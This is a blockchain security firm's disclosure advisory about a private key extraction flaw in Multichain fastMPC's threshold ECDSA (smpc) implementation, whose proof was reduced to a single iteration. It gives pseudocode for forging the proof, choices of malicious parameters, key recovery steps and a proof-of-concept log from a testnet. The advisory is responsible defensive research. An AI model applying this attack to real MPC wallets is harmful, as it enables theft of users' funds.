[VSA-2022-120] Multichain: Key Extraction Vulnerability in fastMPC's Secure Multi-Party Client (smpc)
Since October 2022, Verichains has been conducting extensive research on threshold ECDSA security. Our research has led us to discover new key extraction attacks that affect nearly all implementations of the Threshold Signature Scheme (TSS), including popular open-source TSS libraries, despite having undergone multiple security audits. Verichains plans to release advisories for all the vulnerabilities after they are addressed by vendors. Stay tuned for more updates. Â
In December 2022, we reported a private key extraction vulnerability that completely broke the security of the Threshold Signature Scheme (TSS) implementation by Secure Multi- Party Client (smpc) of Multichain fastMPC mainnet. As a result, a single malicious party can recover the TSS private key of a TSS group, reducing a t/n threshold scheme to 1/n. The attacker only needs to participate in 1 signing ceremony to do so. All Multichain mainnet and testnet smpc nodes, using version 7.2.5 and 7.2.6 respectively, are at risk.
Multichain’s MPC uses an implementation of multi-party threshold ECDSA (elliptic curve digital signature algorithm) based on GG20: One Round Threshold ECDSA with Identifiable Abort and EdDSA (Edwards curve digital signature algorithm), including the implementation of an approval list connected with upper layer business logic and channel broadcasting based on P2P protocol.
A \({NtildeProof}\) (at smpc-lib/crypto/ec2/ntildeZK.go) is used to verify that a prover knows \(\log_gh\) modulo a composite number \(\tilde{N}\). In the implemented TSS protocol, at key generation ceremony, each party is required to generate and broadcast a triple \(\tilde{N}, h_1, h_2\) (for later use in range proofs of the MtA sub-protocol) together with 2 \({NtildeProof}s\) for \(\log_{h_1}h_2\) and \(\log_{h_2}h_1\) modulo \(\tilde{N}\).
Here's the interactive version of \({NtildeProof}\):
Peggy (the prover) commits to a random value \(r \in \mathbb{Z}_n\) (\(n\) is the order of \(g\) known only to Peggy) by sending \(\alpha = g^r\) modulo \(N\) to Victor (the verifier).
Victor chooses and sends Peggy a random bit \(c \in \lbrace 0,1 \rbrace\).
Peggy computes and sends back \(t = r + c\log_gh\).
Victor accepts if and only if \(g^t = \alpha h^c\) modulo \(N\).
This protocol is soundness since given a successful prover, one can apply the rewind technique to extract the discrete logarithm value similar to proving soundness of Schnorr protocol. Note that knowing \(c\) in advance allows an attacker Eve, who does not have the knowledge of \(\log_g h\), to trick Victor into accepting by sending him \(\alpha = g^t h^{-c}\) for an arbitrary \(t\) of Eve's choice at round 1.
The interactive proof above is converted to the non-interactive \({NtildeProof}\) by applying Fiat-Shamir transformation using the SHA512/256 hash function as a random oracle for the challenge bit \(c\). The proof is also repeated 128 times to reduce the soundness error from \(\frac{1}{2}\) (the chance of making a correct guess for \(c\) at the beginning of the protocol) to \(\frac{1}{2^{128}}\). Specifically, \(\overline{c_{127}c_{126}...c_{0}} = H(g,h,n,\alpha_0,\alpha_1,...,\alpha_{127}) \text{ mod } 2^{128}\), where \(c_i, \alpha_i\) is \(c, \alpha\) at the i-th iteration starting from 0, and \(H\) is the hash function.
Forging NtildeProof
In fastMPC implementation at (https://github.com/anyswap/FastMulThreshold-DSA/), the \({Iterations}\) parameter was reduced from 128 to 1, thus making \({NtildeProof}\) easy to forge by trial-and-error.
Given \(\tilde{N}, g, h\), the following pseudocode outputs a valid \({NtildeProof}\) which is essentially an \(\alpha, t\) pair:
Assume the challenge bit \(c_0 = 0\) (can also be \(1\) as well).
Pick a random \(t\) and compute \(\alpha = g^th^{-c_0}\) mod \(\tilde{N}\).
If \(H(g,h,\tilde{N},\alpha) = c_0\) mod \(2\) (probability \(\frac{1}{2}\)), return \(\alpha, t\). Otherwise, go back to step 2.
Note that, \(\log_g h\) mod \(\tilde{N}\) does not necessarily exist. For example, one can forge a proof for \(log_1 2\) even though it does not exist.
Choosing \(\tilde{N}, h_1, h_2\)
The triple \(\tilde{N}, h_1, h_2\) is used in MtA range proofs. MtA stands for multiplicative-to-additive, which is a sub-protocol involving two parties Alice and Bob holding secret values \(a, b\) respectively. At the end of MtA, Alice obtains \(\alpha\) and Bob obtains \(\beta\) such that \(ab = \alpha + \beta\) mod \(q\), the \({secp256k1}\) curve order. During a TSS signing ceremony, for a pair of 2 different parties \(P_i, P_j\), MtA is run four times:
The values of interest are:
\(k_i\): the private nonce share of \(P_i\). If all \(k_i\) are leaked, the private nonce \(k\) could be reconstructed \(\left(k=\sum k_i\right)\) and combined with the message and the signature (both are public information) to recover the private key of the TSS group.
\(w_i\): a value depends on \(P_i\)'s private key share \(x_i\) and which members of the TSS group are currently running the signing ceremony (requiring t/n members). If all \(w_i\) is leaked, the TSS private key \(d\) can be reconstructed by \(d = \sum w_i\).
As a result, we conclude that leaking MtA input \(a\) or \(b\) both lead to TSS private key recovery.
Next, we need to investigate how \(\tilde{N}, h_1, h_2\) is used in MtA. Let \(\tilde{N}_A, h_{1A}, h_{2A}\) and \(\tilde{N}_B, h_{1B}, h_{2B}\) denote Alice and Bob's \(\tilde{N}, h_1, h_2\) respectively. It turns out that the following values are revealed by the range proofs used in MtA:
\(z_A = h_{1B}^ah_{2B}^{\rho_A}\) mod \(\tilde{N}_B\) via Alice range proof for \(a\). \(\rho_A\) is a random value in \(\mathbb{Z}_{q\tilde{N}_B}\).
\(z_B = h_{1A}^bh_{2A}^{\rho_B}\) mod \(\tilde{N}_A\) via Bob respondent range proof for \(b\). \(\rho_B\) is a random value in \(\mathbb{Z}_{q\tilde{N}_A}\).
It can be seen that if Bob is somehow able to eliminate \(h_{2B}^{\rho_A}\) and compute a discrete log to base \(h_{1B}\) modulo \(\tilde{N}_B\), then he could learn Alice's private input \(a\). A similar result can be obtained when the attacker playing on the side of Alice.
To do so, one can choose \(\tilde{N} = \tilde{p}\tilde{q}\) (\(\tilde{p}, \tilde{q}\) are both prime) such that:
\(\tilde{p}\) is just around 257-bit long. Computing discrete logarithm over \(\mathbb{Z}_{\tilde{p}}\) instead of \(\mathbb{Z}_{\tilde{N}}\) drastically reduces its difficulty. Also, \(\tilde{p} > q\), the \({secp256k1}\) curve order.
\(\tilde{p} - 1\) is smooth to make computing discrete logarithm over \(\mathbb{Z}_{\tilde{p}}\) more efficient.
Since \({NtildeProof}\) can be forged, \(h_1, h_2\) can be freely chosen such that:
\(h_1\) has large multiplicative order in \(\mathbb{Z}_{\tilde{p}}\) (at least \(q\), the curve order). Any random value is likely to satisfy this condition.
\(h_2 = 1\) mod \(\tilde{p}\).
For example, let \(h_1=2\) and \(h_2=\tilde{p}+1\) (note that \(h_2 = 1\) is rejected by the TSS implementation), given \(z = h_1^x h_2^r\) mod \(\tilde{N}\), we have \(z = h_1^x\) mod \(\tilde{p}\). Computing a discrete log to base \(h_1\) should give us \(x\), since \(x\) is either \(a\) or \(b\) (MtA inputs) bounded by the \({secp256k1}\) curve order.
Recovering the private key
Assuming that Eve, the malicious party, has successfully generated and broadcasted, during a key generation ceremony, a triple \(\tilde{N}, h_1, h_2\) together with 2 forged \({NtildeProof}\)s for \(\log_{h_1} h_2\) and \(\log_{h_2} h_1\) following the above approach, upon participating in the first signing ceremony, Eve can recover the generated TSS private key by:
Collect all \(z_A\) in Alice range proofs received from other parties when playing as Bob in the 1st/2nd or 3rd/4th iteration of the MtA sub-protocol. Compute \(k_i = \log_{h_1}{z_{A,i}}\) mod \(\tilde{p}\) for each \(z_{A,i}\) received from party \(i\).
Compute the nonce \(k = \sum{k_i}\).
Let \(z\) and \(r,s\) denote the message hash and result signature respectively, the TSS private key can be derived from the ECDSA relation: \(s = k(z+rd)\) mod \(q\).
The vulnerability was exploited successfully in a local testnet to recover the private key. In short, the steps to exploit are:
Forging \({NtildeProof}\)s for a malicious triple \(\tilde{N}, h_1, h_2\).
Broadcast the malicious params to other parties during a key generation
Recover the generated TSS private key via MtA range proofs during the first involving signing ceremony.
Below is the output of our exploit PoC running from a malicious node on the local Multichain testnet:
2022-12-06T12:01:02.523984059Z UDP listener up, self enode://4af6cc6e7b48f2e862549b01d44bca404e07f3f32463c7140bef55d7f84a852525c2e31c9e26e5e07f4257187bc056353fcbce993e73c53edfddaf5415f80b21@[::]:4441
2022-12-06T12:01:51.770533418Z Success Generate Safe Random Prime.
2022-12-06T12:02:18.212509408Z Success Generate Safe Random Prime.
2022-12-06T12:02:42.055397130Z Success Generate Safe Random Prime.
2022-12-06T12:03:10.531709969Z Success Generate Safe Random Prime.
2022-12-06T12:03:43.133423397Z Generating malicious params...
2022-12-06T12:03:43.699562846Z Done.
2022-12-06T12:03:43.699595341Z p=1397988655427498033607504392236996143671539995276788072432319907517515872774167
2022-12-06T12:03:43.699600102Z h1=1337
2022-12-06T12:03:43.699603072Z h2=1397988655427498033607504392236996143671539995276788072432319907517515872774168
2022-12-06T12:03:45.115375695Z Generated public key: 04639c0c4ec4fe0bfcf2f3118295224b61922e912ef388fefeea3f785eec6990663ae0539820f3909912492413c16de12453922c2b57b849b3e15d739fde1a5498
2022-12-06T12:03:56.406497309Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:03:56.406544791Z Recovering nonce...
2022-12-06T12:03:56.456981979Z Nonce recovered: {"nonce": "604b612378afa1bb06d68030af7a827a6891f923a00859807eea17c7a6ff0096"}
2022-12-06T12:03:58.878456928Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:03:58.878901782Z Recovering nonce...
2022-12-06T12:03:58.925025669Z Nonce recovered: {"nonce": "f40e1eeeb9068928d6748f5fab42243909deda3628ce8e2905bf33044fb24d22"}
2022-12-06T12:04:02.072509295Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:02.072551014Z Recovering nonce...
2022-12-06T12:04:02.115203957Z Nonce recovered: {"nonce": "42dcb5f00f897648cceede5e22c6ae1a87db8e19f31b2c8fe48ef7cde3e1f874"}
2022-12-06T12:04:04.526795209Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:04.526844608Z Recovering nonce...
2022-12-06T12:04:04.583039899Z Nonce recovered: {"nonce": "27f01891515bc6693b7a6e97dd19857f9456b43003728a54ceb1437c2b120504"}
2022-12-06T12:04:06.983777405Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:06.984247483Z Recovering nonce...
2022-12-06T12:04:07.030597588Z Nonce recovered: {"nonce": "f327acf129d27d2f5132cbc717d2612075080c3fb3ee6dd7e09f06a0fa63cd0e"}
2022-12-06T12:04:09.416853311Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:09.416902408Z Recovering nonce...
2022-12-06T12:04:09.470678907Z Nonce recovered: {"nonce": "619d2994bdf53c433948a196ba369680610957418b55aa76cfd05d0cee98cb78"}
2022-12-06T12:04:11.886891397Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:11.886941238Z Recovering nonce...
2022-12-06T12:04:11.934133644Z Nonce recovered: {"nonce": "cfb246ad4af06b1f90c7a65a8f8ac41357ada212fece475374e857aaa24638a5"}
2022-12-06T12:04:15.050925140Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:15.051012779Z Recovering nonce...
2022-12-06T12:04:15.100951769Z Nonce recovered: {"nonce": "e998f91af3eecea735d1e5ac216986618f1ae5e0d0bbd148cbd2b78e31370bb7"}
2022-12-06T12:04:17.283668877Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:17.283766892Z Recovering nonce...
2022-12-06T12:04:17.338165881Z Nonce recovered: {"nonce": "1eecfe9f5dd8331ab7e9eb7e9ffce584bdfac8c9bde39aae2faa88217dc63bfa"}
2022-12-06T12:04:19.616866563Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:19.616926849Z Recovering nonce...
2022-12-06T12:04:19.664266938Z Nonce recovered: {"nonce": "852a6bda7c29f6ca3eb938c99fd3ebd94bc8a9155724370c2dd4fbdbb5cf6a3e"}
2022-12-06T12:04:27.289974470Z ECDSA SIGNING ROUND 4 - ATTACKING MODE ENABLED!
2022-12-06T12:04:27.290025287Z Recovering nonce...
2022-12-06T12:04:27.339265414Z Nonce recovered: {"nonce": "f7a7ae7b8b99dd4c6c6b91c603549d1cb562ee67b85d4369b70a2e363e68a4df"}
2022-12-06T12:04:40.795847323Z ECDSA Signature Verify Passed! (r,s) is a Valid Signature
2022-12-06T12:04:40.795897680Z Recovering private key...
2022-12-06T12:04:40.807612263Z Private key recovered: {"private_key": "344baeb4f4b07b782a60e5bad1a9e9786ad28b3ab5d21d405c909a6d2cd57042", "public_key": "04639c0c4ec4fe0bfcf2f3118295224b61922e912ef388fefeea3f785eec6990663ae0539820f3909912492413c16de12453922c2b57b849b3e15d739fde1a5498"}
2022-12-06T12:04:40.807679740Z r = 106902443427639498321207611372712013732475172300043096027809929046979058428310
2022-12-06T12:04:40.807688421Z s = 535377015853193739489643408127267164275156919047993851091258776682381044120
2022-12-06T12:04:40.807692735Z SignEC3,verify (r,s) pass,rsv str = EC58A386DA67BB7927D465CADAC3CD6E39E36667A4F70CBD292ABE2AEC516996012F033D338E852178B755BE7D9CE821BC2D7DE23AD7107EF91069C4ECE5E99801, key = 0x28795447d8f6976fedad13fe67105973804f6de1ee7fae39dab5be6bc0818394
The above POC showed that a single malicious node successfully extracted the private key from a MPC wallet on a Multichain fastMPC testnet.
Suggested Fix
Increase the Iterations parameter to 128.
We express our gratitude to the Multichain team for their prompt efforts in addressing and the bug bounty reward.
Dec 07, 2022: Report privately to the Multichain team
Dec 12, 2022: Multichain released a patch to fix the issues (https://github.com/anyswap/FastMulThreshold-DSA/commit/7727e4f833778c7ba847b3dce66e022595afad73)
Feb 13, 2023: Received a bug bounty reward from Multichain
Mar 27, 2023: Public release
You can read the original paper explaining this vulnerability in PDF format by following this link.
About Verichains
Verichains is a leading blockchain security firm specializing in code audits, cryptanalysis, perimeter security, and incident investigation. Founded in 2017 by world-class security researchers, the company leverages extensive expertise in security, cryptography, and core blockchain technology and has helped investigate and fix security issues in the largest crypto hacks, including the BNB Bridge and Ronin Bridge. For any inquiries or questions, please contact us at info@verichains.io.
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